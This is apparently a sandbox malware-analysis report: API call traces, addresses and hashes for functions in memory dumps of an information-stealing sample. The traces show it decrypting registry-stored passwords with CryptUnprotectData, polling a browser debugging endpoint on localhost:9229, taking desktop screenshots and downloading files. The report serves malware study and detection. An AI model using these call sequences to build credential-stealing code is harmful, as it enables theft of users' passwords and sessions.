Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Internet$strlen$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_
String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
API String ID: 4166274400-2144369209
Opcode ID: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
Instruction ID: a7d092efa737f0fe45e53d089a45e304e661b41fe404ce77bc48f3d160830c15
Opcode Fuzzy Hash: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
Instruction Fuzzy Hash: AD51C571B00205ABDB20DFA4DC45BDEF7F9DB48714F14416AF904E3281DBB8EA4587A9

Function 0247B660 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247B687
lstrcpy.KERNEL32(00000000,00000000), ref: 0247B6D5
lstrcpy.KERNEL32(00000000,00000000), ref: 0247B700
lstrcat.KERNEL32(00000000,00000000), ref: 0247B708
lstrcpy.KERNEL32(00000000,00000000), ref: 0247B730
lstrlen.KERNEL32(00435214), ref: 0247B7A7
lstrcpy.KERNEL32(00000000,00000000), ref: 0247B7CB
lstrcat.KERNEL32(00000000,00435214), ref: 0247B7D7
lstrcpy.KERNEL32(00000000,00000000), ref: 0247B800
lstrlen.KERNEL32(00000000), ref: 0247B884
lstrcpy.KERNEL32(00000000,00000000), ref: 0247B8AE
lstrcat.KERNEL32(00000000,00000000), ref: 0247B8B6
lstrcpy.KERNEL32(00000000,00000000), ref: 0247B8DE
lstrlen.KERNEL32(0043509C), ref: 0247B955
lstrcpy.KERNEL32(00000000,00000000), ref: 0247B979
lstrcat.KERNEL32(00000000,0043509C), ref: 0247B985
lstrcpy.KERNEL32(00000000,00000000), ref: 0247B9B5
lstrlen.KERNEL32(?), ref: 0247BABE
lstrlen.KERNEL32(?), ref: 0247BACD
lstrcpy.KERNEL32(00000000,00000000), ref: 0247BAF5

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
Instruction ID: 678e3e1ddb5d2e097c462596159664e51d665e244e0568f9523e27416a5851fd
Opcode Fuzzy Hash: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
Instruction Fuzzy Hash: 90023E70A01605CFDB24DF65C988AAABBF6EF4430CF19806ED8299B361D775D842CF90

Function 00407710 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringregistrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
strlen.MSVCRT ref: 004077BE
StrStrA.SHLWAPI(?,Password), ref: 004077F8
strlen.MSVCRT ref: 0040788D

Part of subcall function 00407690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
Part of subcall function 00407690: HeapAlloc.KERNEL32(00000000), ref: 004076A5
Part of subcall function 00407690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
Part of subcall function 00407690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
Part of subcall function 00407690: LocalFree.KERNEL32(?), ref: 004076F7

strcpy_s.MSVCRT ref: 00407821
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
HeapFree.KERNEL32(00000000), ref: 00407833
strlen.MSVCRT ref: 00407840
strcpy_s.MSVCRT ref: 0040786A
strlen.MSVCRT ref: 004078B4
RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00407975

Strings

Password, xrefs: 004077EC

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocByteCharCryptDataLocalMultiOpenUnprotectWide
String ID: Password
API String ID: 3893107980-3434357891
Opcode ID: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
Instruction ID: e4d9b8b39298a74cb5cd03489e7ec67c358bc82c244f10be08d5cfcaf05cec85
Opcode Fuzzy Hash: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
Instruction Fuzzy Hash: 16810EB1D00219AFDB10DF95DC84ADEB7B9EF48300F10816AE505F7250EB75AA45CFA5

Function 0041F100 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041F134
lstrcpy.KERNEL32(00000000,?), ref: 0041F162
StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F176
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F185
LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1A3
StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1D1
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1E4
strtok.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1F6
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F202
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F24F
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F28F

Strings

ERROR, xrefs: 0041F170, 0041F20F, 0041F249, 0041F289

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$AllocLocalstrtok
String ID: ERROR
API String ID: 2137491262-2861137601
Opcode ID: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
Instruction ID: 57b76eaee00c9718718f693bae5590ba1c15cb9a89fb7e987ba6136f15d61003
Opcode Fuzzy Hash: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
Instruction Fuzzy Hash: DB51D375A002019FCB20AF75CD49AAB77B5AF44314F04417AF849EB3A1DB78DC468BD8

Function 0248F367 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0248F39B
lstrcpy.KERNEL32(00000000,?), ref: 0248F3C9
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0248F3DD
lstrlen.KERNEL32(00000000), ref: 0248F3EC
LocalAlloc.KERNEL32(00000040,00000001), ref: 0248F40A
StrStrA.SHLWAPI(00000000,?), ref: 0248F438
lstrlen.KERNEL32(?), ref: 0248F44B
strtok.MSVCRT(00000001,?), ref: 0248F45D
lstrlen.KERNEL32(00000000), ref: 0248F469
lstrcpy.KERNEL32(00000000,ERROR), ref: 0248F4B6
lstrcpy.KERNEL32(00000000,ERROR), ref: 0248F4F6

Strings

ERROR, xrefs: 0248F3D7, 0248F476, 0248F4B0, 0248F4F0

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$AllocLocalstrtok
String ID: ERROR
API String ID: 2137491262-2861137601
Opcode ID: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
Instruction ID: 1a9a2c64898b957d2591a70c6f109607bc246064cff26808feaf8097000e4454
Opcode Fuzzy Hash: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
Instruction Fuzzy Hash: 42519A71A202559FCB21FF39CC48EAE7BA6AF84708F05451BEC599BA11DB74D805CB90

Function 0040A070 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00A0BB28,00639BD8,0000FFFF), ref: 0040A086
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040A0B3
lstrlenA.KERNEL32(00639BD8), ref: 0040A0C0
lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A0EA
lstrlenA.KERNEL32(00435210), ref: 0040A0F5
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A112
lstrcatA.KERNEL32(00000000,00435210), ref: 0040A11E
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A144
lstrcatA.KERNEL32(00000000,00000000), ref: 0040A14F
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A174
SetEnvironmentVariableA.KERNEL32(00A0BB28,00000000), ref: 0040A18F
LoadLibraryA.KERNEL32(00A0EB10), ref: 0040A1A3

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID:
API String ID: 2929475105-0
Opcode ID: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
Instruction ID: 94f9c8f72257bf504f41825e736cba288604a750adbbaa2107b6746afa8b652b
Opcode Fuzzy Hash: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
Instruction Fuzzy Hash: E491B231600B009FC7209FA4DC44AA736A6EB44709F40517AF805AB3E1EBBDDD918BD6

Function 0247A2D7 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(006388B4,00639BD8,0000FFFF), ref: 0247A2ED
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0247A31A
lstrlen.KERNEL32(00639BD8), ref: 0247A327
lstrcpy.KERNEL32(00000000,00639BD8), ref: 0247A351
lstrlen.KERNEL32(00435210), ref: 0247A35C
lstrcpy.KERNEL32(00000000,00000000), ref: 0247A379
lstrcat.KERNEL32(00000000,00435210), ref: 0247A385
lstrcpy.KERNEL32(00000000,00000000), ref: 0247A3AB
lstrcat.KERNEL32(00000000,00000000), ref: 0247A3B6
lstrcpy.KERNEL32(00000000,00000000), ref: 0247A3DB
SetEnvironmentVariableA.KERNEL32(006388B4,00000000), ref: 0247A3F6
LoadLibraryA.KERNEL32(00638D78), ref: 0247A40A

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID:
API String ID: 2929475105-0
Opcode ID: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
Instruction ID: 1bd124a3a8e5d9bde36f3140fa6d269a9099a4101f2b1d11fbe93453597a9182
Opcode Fuzzy Hash: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
Instruction Fuzzy Hash: BE91BD71600A209FD7309F65DC88AEB37B7EB84709F50442AE8258B361EBB5D981CFD1

Function 0040BCE9 Relevance: 18.2, APIs: 12, Instructions: 249stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040BD0F
lstrlenA.KERNEL32(00000000), ref: 0040BD42
lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD6C
lstrcatA.KERNEL32(00000000,00000000), ref: 0040BD74
lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD9C
lstrlenA.KERNEL32(0043509C), ref: 0040BE13

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
Instruction ID: 76368cc7b8b4fa27ce7ffa11b26ea8b40865ffa98968743eda1335703526e589
Opcode Fuzzy Hash: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
Instruction Fuzzy Hash: B4A13D71A012058FCB14DF29C949A9BB7B1EF44304F14847AE405AB3E1DB79DC42CBD8

Function 0248EAE7 Relevance: 18.2, APIs: 12, Instructions: 200stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0248EB35
lstrcpy.KERNEL32(00000000,?), ref: 0248EB67
lstrcat.KERNEL32(?,00000000), ref: 0248EB73
lstrcat.KERNEL32(?,004354E4), ref: 0248EB8A
SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0248EBF3
lstrcpy.KERNEL32(00000000,?), ref: 0248EC27
lstrcat.KERNEL32(?,00000000), ref: 0248EC33
lstrcat.KERNEL32(?,00435504), ref: 0248EC4A
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0248ECB8
lstrcpy.KERNEL32(00000000,?), ref: 0248ECE9
lstrcat.KERNEL32(?,00000000), ref: 0248ECF5
lstrcat.KERNEL32(?,00435518), ref: 0248ED0C

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
Instruction ID: b9555b260363e2d8cd4cc5c8f84c3a01304baef9854e28559ff42cfce4c73599
Opcode Fuzzy Hash: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
Instruction Fuzzy Hash: 6761C271604354ABD324FF70DC45FDE7BE5AF88700F10881EBA9997191DBB4D6088BA6

Function 00418240 Relevance: 18.2, APIs: 12, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00418263
lstrlenA.KERNEL32(00000000), ref: 0041829C
lstrcpy.KERNEL32(00000000,00000000), ref: 004182D3
lstrlenA.KERNEL32(00000000), ref: 004182F0
lstrcpy.KERNEL32(00000000,00000000), ref: 00418327
lstrlenA.KERNEL32(00000000), ref: 00418344
lstrcpy.KERNEL32(00000000,00000000), ref: 0041837B
lstrlenA.KERNEL32(00000000), ref: 00418398
lstrcpy.KERNEL32(00000000,00000000), ref: 004183C7
lstrlenA.KERNEL32(00000000), ref: 004183E1
lstrcpy.KERNEL32(00000000,00000000), ref: 00418410
strtok_s.MSVCRT ref: 0041842A

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$strtok_s
String ID:
API String ID: 2211830134-0
Opcode ID: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
Instruction ID: 84294ead90c4b52274de6bcb271b081bded899c4d10f8e28530b9caff154e1d2
Opcode Fuzzy Hash: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
Instruction Fuzzy Hash: F3516F716006139BDB149F39D948AABB7A5EF04340F10412AEC05E7384EF78E991CBE4

Function 02494427 Relevance: 16.7, APIs: 11, Instructions: 178COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 024944CB
GetDesktopWindow.USER32 ref: 024944D5
GetWindowRect.USER32(00000000,?), ref: 024944E3
SelectObject.GDI32(00000000,00000000), ref: 0249451A
GetHGlobalFromStream.COMBASE(?,?), ref: 0249459C
GlobalLock.KERNEL32(?), ref: 024945A7
GlobalSize.KERNEL32(?), ref: 024945B6

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
String ID:
API String ID: 1264946473-0
Opcode ID: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
Instruction ID: a5939312335d6e71548687aa3b7ba579b0acdac450f37c2ef2d64b4cdb6af024
Opcode Fuzzy Hash: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
Instruction Fuzzy Hash: 035109B1114340AFD710EF65DC88EAABBEAEB88714F00491EF99583250DB74E905CFA2

Function 0248E327 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00638B0C), ref: 0248E394
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0248E3BE
lstrcpy.KERNEL32(00000000,?), ref: 0248E3F6
lstrcat.KERNEL32(?,00000000), ref: 0248E404
lstrcat.KERNEL32(?,?), ref: 0248E41F
lstrcat.KERNEL32(?,?), ref: 0248E433
lstrcat.KERNEL32(?,00638A84), ref: 0248E447
lstrcat.KERNEL32(?,?), ref: 0248E45B
lstrcat.KERNEL32(?,00638AC8), ref: 0248E46E
lstrcpy.KERNEL32(00000000,?), ref: 0248E4A6
GetFileAttributesA.KERNEL32(00000000), ref: 0248E4AD

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AttributesFileFolderPath
String ID:
API String ID: 4230089145-0
Opcode ID: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
Instruction ID: b6a50315060e315abbca6a45d727225d36abe2c5acb913e714c53a9d3da09bd8
Opcode Fuzzy Hash: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
Instruction Fuzzy Hash: 986151B591012CEBCB14EF74CD44ADD77B6AF88300F1049AAE959A3250DBB4AF85DF90

Function 00406A10 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00406A3F
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406A6C
StrCmpCA.SHLWAPI(?,00A0FE90), ref: 00406A8A
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406AAA
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406AC8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406AE1
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406B06
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406B30
CloseHandle.KERNEL32(00000000), ref: 00406B50
InternetCloseHandle.WININET(00000000), ref: 00406B57
InternetCloseHandle.WININET(?), ref: 00406B61

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
String ID:
API String ID: 2500263513-0
Opcode ID: 885081f6fd0acedf355e9bb4124bd6bae7afd19d039d18dcdc55a63b4105ae60
Instruction ID: 214ef142a420c546876de0997919582a0985ebf66699d200bad1b39cea3fe35b
Opcode Fuzzy Hash: 885081f6fd0acedf355e9bb4124bd6bae7afd19d039d18dcdc55a63b4105ae60
